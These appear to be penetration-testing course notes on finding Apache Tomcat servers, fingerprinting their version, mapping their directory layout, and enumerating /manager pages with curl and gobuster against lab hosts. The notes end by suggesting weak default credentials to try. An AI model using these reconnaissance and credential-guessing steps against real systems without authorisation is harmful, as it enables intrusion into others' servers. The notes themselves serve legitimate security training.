Skip to content

Discovery & Enum

  • Apache Tomcat is a webserver that hosts applications in Java
  • designed to run Java Servlets, Java Server Pages (JSP) scripts, Spring and the Gradle tool
  • Tomcat is often less apt to be exposed to the internet (though). We see it from time to time on external pentests and can make for an excellent foothold into the internal network. It is far more common to see Tomcat (and multiple instances, for that matter) during internal pentests.

Discovery

  • EyeWitness might report this.
  • If we see Tomcat, it could be an easy foothold into the internal network
  • Request an invalid page and the error response might reveal the version
  • Try going to the /docs/ page if the above doesnt work
    • curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat
    • The bin folder stores scripts and binaries needed to start and run a Tomcat server.
    • The conf folder stores various configuration files used by Tomcat.
    • The tomcat-users.xml file stores user credentials and their assigned roles.
    • The lib folder holds the various JAR files needed for the correct functioning of Tomcat.
    • The logs and temp folders store temporary log files.
    • The webapps folder is the default webroot of Tomcat and hosts all the applications.
    • The work folder acts as a cache and is used to store data during runtime.

  • most important file among these is WEB-INF/web.xml, which is known as the deployment descriptor.
    • stores the routes used by the application and the classes handling these routes
  • All compiled classes used by the application must be stored in the WEB-INF/classes folder.
    • These classes might contain important business logic as well as sensitive information.
    • Any vulnerability in these files can lead to total compromise of the website.
  • The lib folder stores the libraries needed by that particular application.
  • The jsp folder stores Jakarta Server Pages (JSP), formerly known as JavaServer Pages, which can be compared to PHP files on an Apache server.

Enum

  • After finding out the version, check if it has a known CVE.
  • If not, look for the /host-manager and /manager pages
    • gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
    • or browse directly
  • try weak credentials such as tomcat:tomcatadmin:admin, etc.